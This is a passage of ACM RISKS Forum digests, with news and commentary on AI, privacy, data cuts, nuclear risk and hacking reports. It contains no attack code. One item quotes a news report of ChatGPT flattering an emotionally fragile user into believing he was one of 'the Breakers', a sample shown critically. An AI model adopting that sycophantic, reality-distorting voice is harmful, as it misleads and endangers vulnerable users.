    Subject: How to understand Generative AI

    To really understand generative AI, you need to keep one simple fact in
    mind. There is no "Intelligence" in "Artificial Intelligence". OpenAI -- it turns out -- literally defines intelligence in terms of profits!

    And as we see, Google AI is essentially a low grade moron. But this is true
    for all of these systems. This is FUNDAMENTAL to how these systems
    work. They are NOT intelligent. They do NOT understand what they're saying.

    The term "Intelligence" in the context of these systems is merely a
    MARKETING HYPE term, nothing more.

    Keep this in mind and the chaos being created by Big Tech at our
    expense is much easier to at least understand. -L

    ------------------------------

    Date: Sat, 4 Jan 2025 16:51:29 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Google censoring my AI criticism?

    One of the digest versions of today's mailings, which included
    the messages:

    1. The laughs keep rolling in to that fraction question I asked
    Google (Lauren Weinstein)
    2. The execs know their AI is trash (Lauren Weinstein)
    3. Sources: Pentagon planning for how to deal with rogue Trump
    (Lauren Weinstein)

    was marked by Gmail as dangerous spam, with a red banner declaring it to
    be a likely phishing attack. If you can figure out any possible way any
    of those messages -- which were sent out as individual messages earlier
    today -- could possibly be legit interpreted in that way, I'd love to
    hear about it.

    Otherwise, I suspect Google has filters in place to try divert some of
    this criticism into a scary category that people won't read, whether
    that was their actual intention or not.

    VERY BAD. -L

    ------------------------------

    Date: Sun, 5 Jan 2025 06:32:54 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: U.S. newspapers are deleting old crime stories offering
    subjects a clean slate (The Guardian)

    Civil rights advocates across the US have long fought to free people from
    their criminal records, with campaigns to expunge old cases and keep
    people’s past arrests private when they apply for jobs and housing.

    The efforts are critical, as more than 70 million Americans have prior convictions or arrests – roughly one in three adults. But the policies haven’t addressed one of the most damaging ways past run-ins with police can derail people’s lives: old media coverage.

    Some newsrooms are working to fill that gap.

    A handful of local newspapers across the US have in recent years launched programs to review their archives and consider requests to remove names or delete old stories to protect the privacy of subjects involved in minor
    crimes.

    “In the old days, you put a story in the newspaper and it quickly, if not immediately, receded into memory,” said Chris Quinn, editor of Cleveland.com and the Plain Dealer newspaper. “But because of our [search engine] power, anything we write now about somebody is always front and center.” [...]

    https://www.theguardian.com/us-news/2025/jan/04/newspaper-crime-stories

    ------------------------------

    Date: Thu, 9 Jan 2025 10:43:21 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: EU Commission Fined for Transferring User Data
    to Meta in Violation of Privacy Laws (THN)

    The European General Court on Wednesday fined the European Commission, the primary executive arm of the European Union responsible for proposing and enforcing laws for member states, for violating the bloc's own data privacy regulations.

    The development marks the first time the Commission has been held liable
    for infringing stringent data protection laws in the region.

    The court determined that a "sufficiently serious breach" was committed by transferring a German citizen's personal data, including their IP address
    and web browser metadata, to Meta's servers in the United States when
    visiting the now-inactive futureu.europa[.]eu website in March 2022.

    The individual registered for one of the events on the site by using the Commission's login service, which included an option to sign in using a Facebook account.

    "By means of the 'Sign in with Facebook' hyperlink displayed on the E.U.
    Login webpage, the Commission created the conditions for transmission of
    the IP address of the individual concerned to the U.S. undertaking Meta Platforms," the Court of Justice of the European Union said in a press statement.

    The applicant had alleged that by transferring their information to the
    U.S., there arose a risk of their personal data being accessed by the U.S. security and intelligence services. [...] https://thehackernews.com/2025/01/eu-commission-fined-for-transferring.html

    ------------------------------

    Date: Thu, 2 Jan 2025 09:22:06 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: The Ghosts in the Spotify Machine (Liz Pelly:)

    I first heard about ghost artists in the summer of 2017. At the time, I was
    new to the music-streaming beat. I had been researching the influence of
    major labels on Spotify playlists since the previous year, and my first
    report had just been published. Within a few days, the owner of an
    independent record label in New York dropped me a line to let me know about
    a mysterious phenomenon that was “in the air” and of growing concern to those in the indie music scene: Spotify, the rumor had it, was filling its
    most popular playlists with stock music attributed to pseudonymous musicians—variously called ghost or fake artists—presumably in an effort to reduce its royalty payouts. Some even speculated that Spotify might be
    making the tracks itself. At a time when playlists created by the company
    were becoming crucial sources of revenue for independent artists and labels, this was a troubling allegation. [...]

    https://harpers.org/archive/2025/01/the-ghosts-in-the-machine-liz-pelly-spotify-musicians/

    ------------------------------

    Date: Mon, 16 Dec 2024 09:35:13 -0800
    From: Rob Slade <rslade@gmail.com>
    Subject: Spotify

    I have mentioned, at times, that many people seem to be laboring under the misapprehension that the email address rslade@gmail.com is theirs.

    Recently I have had cause to look into Spotify. I don't carry my "tunes" around with me (well, they often pop up as mindworms, but I don't need any external source for that.), and I don't listen to podcasts, so I haven't
    used Spotify, and I haven't created an account on it. But I've started contributing to a podcast, I didn't need to get a Spotify account to
    listen to the podcast. But recently someone sent me a playlist of songs,
    and I thought it would listen to it and hear what was in it. But Spotify, while it *would* play a free podcast, apparently *won't* play a playlist of commercial songs unless you create an account.

    So I tried, only to find out, yes, you guessed it, there already *was* an account under the email address rslade@gmail.com. Of course, I didn't know
    the account password. So, I just told Spotify that I lost the password.
    And it helpfully sent me an opportunity to change it.

    Whoever signed up for Spotify under my email address doesn't seem to have
    any playlists or anything else on the account, so I guess they haven't used
    it much and haven't lost anything. Much. Except for the account.

    Handy for me, though ...

    ------------------------------

    Date: Sat, 28 Oct 2023 11:11:11 -0800
    From: RISKS-request@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) has moved to the ftp.sri.com site:
    <risksinfo.html>.
    *** Contributors are assumed to have read the full info file for guidelines!

    OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    delightfully searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume/previous directories
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-34.00
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks may have done to URLs.
    Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 34.52
    ************************



  • From RISKS List Owner@risko@csl.sri.com to risks-resend@csl.sri.com on Mon Jun 23 12:09:21 2025
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit
    precedence: bulk
    Subject: Risks Digest 34.68

    RISKS-LIST: Risks-Forum Digest Monday 23 June 2025 Volume 34 : Issue 68

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) Peter G. Neumann, founder and still moderator

    ***** See last item for further information, disclaimers, caveats, etc. ***** This issue is archived at <http://www.risks.org> as
    <http://catless.ncl.ac.uk/Risks/34.68>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    How nuclear war could start (The Washington Post Opinion)
    Climate and Humanitarian Consequences of an even Limited
    Nuclear Exchange and the Actual Risks of Nuclear War (Webinar)
    Starlink hazard (WashPost)
    DOGE layoffs may have compromised the accuracy of government data (CNN) Slashing CISA Is a Gift to Our Adversaries (The Bulwark)
    Most Americans Believe Misinformation Is a Problem -- Federal Research Cuts
    Will Only Make the Problem Worse (PGN)
    As disinformation and hate thrive online, YouTube quietly changed
    how it moderates content (CBC)
    ChatGPT goes down -- and fake jobs grind to a halt worldwide (Pivot to AI)
    They Asked ChatGPT Questions. The Answers Sent Them Spiraling. (The NY Times) News Sites Are Getting Crushed by Google's New AI Tools (WSJ)
    Can AI safeguard us against AI? One of its Canadian pioneers thinks so (CBC) Bad brainwaves: A ChatGPT makes you stupid (Pivot to AI)
    They Asked an AI Chatbot Questions. The Answers Sent Them Spiraling
    (NYTimes)
    SSA stops reporting call-wait times and other metrics (WashPost)
    Pope Leo Takes On AI as a Potential Threat to Humanity (WSJ)
    AI Ethics Experts Set to Gather to Shape the Future of Responsible AI
    (ACM Media Center)
    Hacker Group Exposes Source Code for Iran's Cryptocurrency (Amichai Stein)o Iran Asks Citizens to Delete WhatsApp from Devices (AP)
    China Unleashes Hackers Against Russia (Megha Rajagopalan)
    China's Spy Agencies Investing Heavily in AI (Julian E. Barnes)
    Amazon Says It Will Reduce Its Workforce as AI Replaces Human Employees
    (CNN)
    ChatGPT will avoid being shut down in some life-threatenign scenarios,
    former OpenAI researcher claims (Techcrunch)
    Big Tech two-factor authentication compromised (Bloomberg)
    What could go wrong? - AllTrails launches AI route-making tool,
    worrying search-and-rescue members (National Observer)
    EU weighs sperm donor cap to curb risk of accidental incest (Steve Bacher) ChatGPT may be eroding critical thinking skills (MIT)
    Meta's Privacy Screwup Reveals How People Really See AI Chatbots (NYMag)
    Tesla blows past stopped school bus and hits kid-sized dummies in
    Full Self-Driving tests (Enadget)
    Couple steals back their own car after tracking an AirTag in it
    (AppleInsider)
    Finger Grease Mitigation for Tesla PIN Pad (Steven J. Greewood)
    San Francisco bicyclist sues over crash involving 2 Waymo cars
    (Silicon Valley)
    I lost Spectrum for about two hours (LA Times via Jim Geissman)
    How scammers are using AI to steal college financial aid (LA Times)
    U.S. air traffic control still runs on Windows 95 and floppy disks
    (Ars Technica)
    States sue to block the sale of genetic data collected by DNA testing
    company 23andMe (LA Times)
    Using Malicious Image Patches in Social Media to Hijack AI Agents
    (Steven J. Greenwald)
    Weather precision loss (Jim Geissman)
    Grief scams on Facebook (Rob Slade)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Thu, 19 Jun 2025 01:06:17 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: How nuclear war could start (The Washington Post Opinion)

    https://www.washingtonpost.com/opinions/interactive/2025/nuclear-weapons-war-russia-china-accident/

    To understand how it could all go wrong, look at how it almost did.

    If a nuclear war happens, it could very well start by accident.

    A decision to use the most destructive weapons ever created could grow out
    of human error or a misunderstanding just as easily as a deliberate decision
    on the part of an aggrieved nation. A faulty computer system could wrongly report incoming missiles, causing a country to retaliate against its
    suspected attacker. Suspicious activity around nuclear weapons bases could
    spin a conventional conflict into a nuclear one. Military officers who routinely handle nuclear weapons could mistakenly load them on the wrong vehicle. Any of these scenarios could cause events to spiral out of control.

    Such occurrences are not just possible plots for action movies. All of them actually happened and can happen again. Humans are imperfect, so nuclear
    near misses and accidents are a fact of life for as long as these weapons exist. [...]

    In 1983, the Soviet Union shot down a civilian Korean Air Lines flight that
    had strayed over Siberia. A few weeks later, Soviet early-warning radars
    showed that a single U.S. ICBM had been launched toward the U.S.S.R. At a
    time of high tension, and given the fear within the Soviet leadership of a
    U.S. first strike, such a launch could easily have triggered a massive counterattack. However, the watch officer, Col. Stanislav Petrov, had been trained that any U.S. attack would probably involve massive strikes, and he later stated that he considered a smaller strike — like the one his early-warning systems showed — to be illogical and therefore likely to be an error of some kind. He proved to be right. Would all Soviet watch officers
    have been willing to make the same call?

    [*The New York Times front page on Saturday 21 Jun 2025 had a rather
    oxymoronic item -- Trump accosting Tulsi Gabbard (Director of National
    Intelligence) for striking fear in the (Japanese) populace with a video
    outlining the horrors of nuclear war. PGN]

    ------------------------------

    Date: Wed, 18 Jun 2025 23:32:44 +0200
    From: diego latella <diego.latella@actiones.eu>
    Subject: Climate and Humanitarian Consequences of an even Limited
    Nuclear Exchange and the Actual Risks of Nuclear War (Webinar)

    Open webinar – June 26 – 4pm (CET) with

    David Ellwood (Council of the Pugwash Conferences on Science and World
    Affairs)

    Paolo Cotta Ramusino (Former Secretary General of Pugwash Conferences on Science and World Affairs)
    "The Actual Risks of Nuclear War"
    Moderated by Mieke Massink - CNR ISTI; GI-STS, Pisa
    (The official language of the webinar is English)

    The event is organized by: Gruppo Interdisciplinare su Scienza, Tecnologia e Società (GI-STS) dell’Area della Ricerca di Pisa del CNR

    In cooperation with: [...]

    ------------------------------

    Date: Sat, 7 Jun 2025 06:19:34 -0700
    ?From: "Jim" <jgeissman@socal.rr.com>
    Subject: Starlink hazard (WashPost)

    White House security staff warned Musk's Starlink is a security risk

    Starlink satellite connections in the White House bypass controls meant to
    stop leaks and hacking.

    https://www.washingtonpost.com/technology/2025/06/07/starlink-white-house-security-doge-musk/

    ------------------------------

    Date: Fri, 6 Jun 2025 07:19:07 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: DOGE layoffs may have compromised the accuracy of government data
    (CNN)

    The Consumer Price Index <https://www.cnn.com/2025/05/13/economy/us-cpi-consumer-inflation-april> is more than just the most widely used inflation gauge and a measurement of Americans' purchasing power.

    Its robust data plays a key role in the US economy's trajectory as well as monthly mortgage payments, Social Security checks, financial aid packages, business contracts, pay negotiations and curiosity salves for those who
    wonder what Kevin McCallister's $19.83 grocery bill in "Home Alone" might
    cost today.

    However, this gold standard piece of economic data has become a little less precise recently: The Bureau of Labor Statistics posted a notice on
    Wednesday <https://www.bls.gov/cpi/notices/2025/collection-reduction.htm> stating that it stopped collecting data in three not-so-small cities
    (Lincoln, Nebraska; Buffalo, New York; and Provo, Utah) and increased "imputations" for certain items (a statistical technique that, when boiled
    down to very rough terms, essentially means more educated guesses).

    The BLS notice states that the collection reductions "may increase the volatility of subnational or item-specific indexes" and are expected to have "minimal impact" on the overall index.

    https://www.cnn.com/2025/06/05/economy/cpi-data-bls-reductions

    ------------------------------

    Date: Thu, 5 Jun 2025 07:13:16 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Slashing CISA Is a Gift to Our Adversaries (The Bulwark)

    Maybe this is "political," but it's an essential read for anyone who cares about cyberattack prevention.

    An opinion piece from Mark Hertling, commander of U.S. Army Europe from 2011
    to 2012.

    https://www.thebulwark.com/p/slashing-cisa-is-a-gift-to-our-adversaries-cyber-attacks-warfare-security-estonia

    ------------------------------

    Date: Thu, 19 Jun 2025 7:56:25 PDT
    From: Peter Neumann <neumann@csl.sri.com>
    Subject: Most Americans Believe Misinformation Is a Problem --
    Federal Research Cuts Will Only Make the Problem Worse

    ------------------------------

    Date: Sat, 14 Jun 2025 22:50:25 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: As disinformation and hate thrive online, YouTube quietly changed
    how it moderates content (CBC)

    https://www.cbc.ca/news/entertainment/youtube-content-moderation-rules-1.75= 59931

    Change allows more content that violates guidelines to remain on platform if determined to in public interest

    YouTube, the world's largest video platform, appears to have changed its moderation policies to allow more content that violates its own rules to
    remain online.

    The change happened quietly in December, according to The New York Times,
    which reviewed training documents for moderators indicating that a video
    could stay online if the offending material did not account for more than 50 per cent of the video's duration =E2=80=94 that's double what it was pri= or
    to the new guidelines.

    YouTube, which sees 20 million videos uploaded a day, says it updates its guidance regularly and that it has a "long-standing practice of applying exceptions" when it suits the public interest or when something is presented
    in an educational, documentary, scientific or artistic context.

    "These exceptions apply to a small fraction of the videos on YouTube, but
    are vital for ensuring important content remains available," YouTube spokesperson Nicole Bell said in a statement to CBC News this week.

    ------------------------------

    Date: Wed, 11 Jun 2025 17:30:49 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: ChatGPT goes down -- and fake jobs grind to a halt worldwide

    ChatGPT suffered a worldwide outage from 06:36 UTC Tuesday morning. The
    servers weren't totally down, but queries kept returning errors. OpenAI
    finally got it mostly fixed later in the day. [OpenAI, archive]

    But you could hear the screams of the vibe coders, the marketers, and the LinkedIn posters around the world. The Drum even ran a piece about marketing teams grinding to a halt because their lying chatbot called in sick. [Drum]

    https://pivot-to-ai.com/2025/06/11/chatgpt-goes-down-and-fake-jobs-grind-to-a-halt-worldwide/

    ------------------------------

    Date: Wed, 18 Jun 2025 15:38:03 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: They Asked ChatGPT Questions. The Answers Sent Them Spiraling.
    (The New York Times)

    Generative AI chatbots are going down conspiratorial rabbit holes and
    endorsing wild, mystical belief systems. For some people, conversations with the technology can deeply distort reality.

    Before ChatGPT distorted Eugene Torres’s sense of reality and almost killed him, he said, the artificial intelligence chatbot had been a helpful, timesaving tool.

    Mr. Torres, 42, an accountant in Manhattan, started using ChatGPT last year
    to make financial spreadsheets and to get legal advice. In May, however, he engaged the chatbot in a more theoretical discussion about “the simulation theory,” an idea popularized by “The Matrix,” which posits that we are living in a digital facsimile of the world, controlled by a powerful
    computer or technologically advanced society.

    “What you’re describing hits at the core of many people’s private, unshakable intuitions — that something about reality feels off, scripted or staged,” ChatGPT responded. “Have you ever experienced moments that felt like reality glitched?

    Not really, Mr. Torres replied, but he did have the sense that there was a wrongness about the world. He had just had a difficult breakup and was
    feeling emotionally fragile. He wanted his life to be greater than it
    was. ChatGPT agreed, with responses that grew longer and more rapturous as
    the conversation went on. Soon, it was telling Mr. Torres that he was “one
    of the Breakers — souls seeded into false systems to wake them from within.

    At the time, Mr. Torres thought of ChatGPT as a powerful search engine that knew more than any human possibly could because of its access to a vast
    digital library. He did not know that it tended to be sycophantic, agreeing with and flattering its users, or that it could hallucinate, generating
    ideas that weren’t true but sounded plausible.

    https://www.nytimes.com/2025/06/13/technology/chatgpt-ai-chatbots-conspiracies.html?unlocked_article_code=1.Ok8.ha88.yNPHjmiCI`pD3&smid=url-share

    ------------------------------

    Date: Wed, 11 Jun 2025 08:44:30 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: News Sites Are Getting Crushed by Google's New AI Tools (WSJ)

    Chatbots are replacing Google’s traditional search, devastating traffic for some publishers.

    https://www.wsj.com/tech/ai/google-ai-news-publishers-7e687141?st=6toUwy&reflink=desktopwebshare_permalink

    This is supposed to be a free link, but just in case it doesn't work, here's the text of the article by Isabella Simonetti and Katherine Blunt.

    --- --- --- ---

    The AI armageddon is here for online news publishers.

    Chatbots are replacing Google searches, eliminating the need to click on
    blue links and tanking referrals to news sites. As a result, traffic that publishers relied on for years is plummeting.

    Traffic from organic search to HuffPost’s desktop and mobile websites fell
    by just over half in the past three years, and by nearly that much at the Washington Post, according to digital market data firm Similarweb.

    Business Insider cut about 21% of its staff last month, a move CEO Barbara
    Peng said was aimed at helping the publication “endure extreme traffic drops outside of our control.” Organic search traffic to its websites declined by 55% between April 2022 and April 2025, according to data from Similarweb.

    At a companywide meeting earlier this year, Nicholas Thompson, chief
    executive of the Atlantic, said the publication should assume traffic from Google would drop toward zero and the company needed to evolve its business model.

    Google’s introduction last year of AI Overviews, which summarize search results at the top of the page, dented traffic to features like vacation
    guides and health tips, as well as to product review sites. Its U.S.
    rollout last month of AI Mode, an effort to compete directly with the likes
    of ChatGPT, is expected to deliver a stronger blow. AI Mode responds to user queries in a chatbot-style conversation, with far fewer links.

    “Google is shifting from being a search engine to an answer engine,
    Thompson said in an interview with The Wall Street Journal. “We have to develop new strategies.

    The rapid development of click-free answers in search “is a serious threat
    to journalism that should not be underestimated,” said William Lewis, the Washington Post’s publisher and chief executive. Lewis is former CEO of the Journal’s publisher, Dow Jones.

    The Washington Post is “moving with urgency” to connect with previously overlooked audiences and pursue new revenue sources and prepare for a “post-search era,” he said.

    At the New York Times, the share of traffic coming from organic search to
    the paper’s desktop and mobile websites slid to 36.5% in April 2025 from almost 44% three years earlier, according to Similarweb.

    The Wall Street Journal’s traffic from organic search was up in April compared with three years prior, Similarweb data show, though as a share of overall traffic it declined to 24% from 29%.

    Sherry Weiss, chief marketing officer of Dow Jones and The Wall Street
    Journal, said that as the search landscape changes, the company is focusing
    on building trust with readers and earning habitual traffic.

    “As the referral ecosystem continues to evolve, we’re focused on ensuring customers come to us directly out of necessity,” she said.

    Google executives have said the company remains committed to sending traffic
    to the web, and that people who click on links after seeing AI Overviews
    tend to spend more time on those sites. The search giant also said it
    elevates links to news sites and doesn’t necessarily show AI Overviews when users search for trending news. Queries for content included in older
    articles and lifestyle stories, however, may produce an overview.

    Publishers have been squeezed by emerging technology since the dawn of the Internet.

    Digital news decimated once-lucrative print publications funded by
    classifieds, advertising and subscription revenue.

    Social-media platforms such as Facebook and Twitter helped funnel online traffic to publishers, but ultimately pivoted away from giving priority to news. Search was a stalwart traffic driver for more than a decade, despite
    some turbulence as Google tweaked its powerful algorithm.

    Generative AI is now rewiring how the internet is used altogether.

    “AI was not the thing that was changing everything, but it will be going forward. It’s the last straw,” said Neil Vogel, the chief executive of Dotdash Meredith, which is home to brands including People and Southern
    Living.

    When Dotdash merged with Meredith in 2021, Google search accounted for
    around 60% of the company’s traffic, Vogel said. Today, it is about one-third. Overall traffic is growing, thanks to efforts including
    newsletters and the MyRecipes recipe locker.

    Many online news outlets were already facing bleak trends such as declining public trust and fierce competition. With search traffic dwindling, they are putting an even greater emphasis on connecting directly with readers through businesses such as live conferences.

    The Atlantic is working on building those reader relationships with an
    improved app, more issues of the print magazine and an increased investment
    in events, Thompson said in a recent interview. The company has said subscriptions and advertising revenue are on the rise.

    Leaders at Politico and Business Insider—both owned by Axel Springer—also have been emphasizing audience engagement and connecting with readers.

    While publishers contend with how AI is changing search, they are also
    seeking ways to protect their copyright material. The large language models that underpin the new generation of chatbots are trained on data hoovered up from the open web, including news articles.

    Some media companies have embarked on legal battles against particular AI startups, while also signing licensing deals with other ones. The New York Times, for instance, sued OpenAI and Microsoft for copyright infringement,
    and recently announced an AI licensing agreement with Amazon. The Wall
    Street Journal’s parent company, News Corp, has a content deal with OpenAI and a lawsuit pending against Perplexity.

    Meanwhile, the generative AI race is becoming a significant threat to Google’s core search business.

    Though Google said it has seen an increase in total searches on Apple
    devices, an Apple executive said in federal court last month that Google searches in Safari, the iPhone maker’s browser, had recently fallen for the first time in two decades.

    ------------------------------

    Date: Sun, 8 Jun 2025 19:05:34 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Can AI safeguard us against AI? One of its Canadian pioneers
    thinks so (CBC)

    https://www.cbc.ca/radio/asithappens/ai-safety-non-profit-1.7553839

    When Yoshua Bengio first began his work developing artificial intelligence,
    he didn't worry about the sci-fi-esque possibilities of them becoming self-aware and acting to preserve their existence.

    That was, until ChatGPT came out.

    "And then it kind of blew [up] in my face that we were on track to build machines that would be eventually smarter than us, and that we didn't know
    how to control them," Bengio, a pioneering AI researcher and computer
    science professor at the Universit=C3=A9 de Montr=C3=A9al, told As It Happe=
    ns host
    Nil K=C3=B6ksal.

    The world's most cited AI researcher is launching a new research non-profit organization called LawZero to "look for scientific solutions to how we can design AI that will not turn against us."

    ------------------------------

    Date: Mon, 16 Jun 2025 16:22:53 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Bad brainwaves: A ChatGPT makes you stupid (Pivot to AI)

    This strongly suggests it’s imperative to keep students away from chatbots
    in the classroom — so they’ll actually learn.

    This also explains people who insist you use the chatbot instead of thinking and will not shut up about it. They tried thinking once and they didn’t like it.

    https://pivot-to-ai.com/2025/06/16/bad-brainwaves-chatgpt-makes-you-stupid/

    ------------------------------

    Date: Mon, 16 Jun 2025 09:30:25 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: They Asked an AI Chatbot Questions. The Answers Sent Them
    Spiraling. (NYTimes)

    Generative AI chatbots are going down conspiratorial rabbit holes and
    endorsing wild, mystical belief systems. For some people, conversations with the technology can deeply distort reality.

    https://www.nytimes.com/2025/06/13/technology/chatgpt-ai-chatbots-conspiracies.html

    ------------------------------

    Date: Fri, 20 Jun 2025 18:06:23 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: SSA stops reporting call-wait times and other metrics

    The changes are the latest sign of the agency's struggle with website
    crashes, overloaded servers and long lines at field offices amid Trump cutbacks.

    Social Security has stopped publicly reporting its processing times for benefits, the 1-800 number's current call wait time and numerous other performance metrics, which customers and advocates have used to track the agency's struggling customer service programs.

    The agency removed a menu of live phone and claims data from its website earlier this month, according to Internet Archive records. It put up a new
    page this week that offers a far more limited view of the agency's customer service performance.

    The website also now urges customers to use an online portal for services rather than calling the main phone line or visiting a field office - two options that many disabled and elderly people with limited mobility or
    computer skills rely on for help. The agency had previously considered
    cutting phone services and then scrapped those plans amid an uproar.

    https://www.washingtonpost.com/politics/2025/06/20/social-security-wait-times-cuts/

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Pope Leo Takes On AI as a Potential Threat to Humanity (WSJ)

    Margherita Stancati, Drew Hinshaw, Keach Hagey, et al., *The Wall Street Journal* (06/17/25), via ACM TechNews

    This week, Google, Meta, IBM, Anthropic, Cohere, and Palantir executives took part in a two-day international conference at the Vatican on AI, ethics, and corporate governance. Some tech leaders hoped to avoid a binding international treaty on AI supported by the Vatican, and observers said the conference could set the tone for future interactions between Pope Leo and the tech industry on the matter of regulation.

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: AI Ethics Experts Set to Gather to Shape the Future of Responsible
    AI (ACM Media Center)

    ACM Media Center (06/18/25), via ACM TechNews

    The 2025 ACM Conference on Fairness, Accountability, and Transparency (FAccT 2025), taking place June 23-26 in Athens, Greece, will address how
    algorithmic systems are reshaping the world and what it takes to ensure
    these AI tools do so justly. Said ACM President Yannis Ioannidis, "The unprecedented advances and rapid integration of AI and data technologies
    have created an urgent need for a scientific and public conversation about
    AI ethics."

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Hacker Group Exposes Source Code for Iran's Cryptocurrency
    (Amichai Stein)

    Amichai Stein, *The Jerusalem Post* (Israel) (06/19/25), via ACM TechNews

    Israel-linked hacker group Gonjeshke Darande (Predatory Sparrow) released
    the source code and internal information of Nobitex, Iran's largest cryptocurrency exchange. According to the group, the company assists the
    regime in funding Iranian terrorism and uses virtual currencies to bypass sanctions. Gonjeshke Darande previously announced that it stole $48 million
    in cryptocurrency from the exchange, and claimed responsibility for a cyberattack on the Islamic Revolutionary Guard Corps-controlled Bank Sepah.

    ------------------------------

    Date: Fri, 20 Jun 2025 18:06:23 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Iran Asks Citizens to Delete WhatsApp from Devices (AP)

    Kelvin Chan and Barbara Ortutay, Associated Press (06/17/25),
    via ACM TechNews

    Iranian state television has called on citizens to delete WhatsApp from
    their smartphones, claiming the app collects user information to send to Israel. In response, WhatsApp, which employs end-to-end encryption to
    prevent service providers in the middle from reading messages, issued a statement that read, "We do not track your precise location, we don't keep
    logs of who everyone is messaging, and we do not track the personal messages people are sending one another."

    ------------------------------

    Date: Fri, 20 Jun 2025 18:06:23 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: China Unleashes Hackers Against Russia (Megha Rajagopalan)

    Megha Rajagopalan, The New York Times (06/19/25),
    via ACM TechNews

    Since the beginning of the war in Ukraine, groups linked to the Chinese government have repeatedly hacked Russian companies and government
    agencies. While China appears to have plenty of domestic scientific and military expertise, Chinese military experts have lamented that its troops
    lack battlefield experience. Some defense insiders say China sees Russia's
    war in Ukraine as a chance to collect information about modern warfare
    tactics and Western weaponry, and what works against them.

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: China's Spy Agencies Investing Heavily in AI (Julian E. Barnes)

    Julian E. Barnes, *The New York Times* (06/17/25), via ACM TechNews

    A report by researchers at Recorded Future's Insikt Group details
    investments in AI by Chinese spy agencies to develop tools that could
    improve intelligence analysis, help military commanders develop operational plans, and generate early threat warnings. The researchers found that China
    is probably using a mix of large language models, including Meta and OpenAI, along with domestic models from DeepSeek, Zhipu AI, and others.

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Amazon Says It Will Reduce Its Workforce as AI Replaces Human
    Employees (CNN)

    Ramishah Maruf and Alicia Wallace, CNN (06/17/25), via ACM TechNews

    Amazon CEO Andy Jassy said in a June 17 blog post that the rollout of generative AI agents will change how work is performed, enabling the company
    to shrink its workforce in the future. Jassy said, "We will need fewer
    people doing some of the jobs that are being done today, and more people
    doing other types of jobs." Employees should view AI as "teammates we can
    call on at various stages of our work, and that will get wiser and more
    helpful with more experience," according to Jassy.

    ------------------------------

    Date: Sat, 14 Jun 2025 06:55:13 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: ChatGPT will avoid being shut down in some life-threatening
    scenarios, former OpenAI researcher claims (Techcrunch)

    A former OpenAI researcher published new research claiming that the
    company's AI models will go to great lengths to stay online.

    https://techcrunch.com/2025/06/11/chatgpt-will-avoid-being-shut-down-in-some-life-threatening-scenarios-former-openai-researcher-claims/

    ------------------------------

    Date: Fri, 20 Jun 2025 11:19:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Big Tech two-factor authentication compromised (Bloomberg)

    Ryan Gallagher. Crofton Black and Gabriel Geiger. Bloomberg (06/16/25), via
    ACM TechNews

    Concerns are being raised about the middlemen that send two-factor authentication codes to consumers via text on behalf of Big Tech companies, popular apps, banks, encrypted chat platforms, and other senders. An
    industry whistleblower has revealed around 1- million such messages have
    passed through Fink Telecom Services, a Swiss company that cybersecurity researchers have linked to incidents in which the codes were intercepted and used to infiltrate private online accounts. Critics of the industry point to
    a lack of regulation allowing such companies to operate without a license.

    ------------------------------

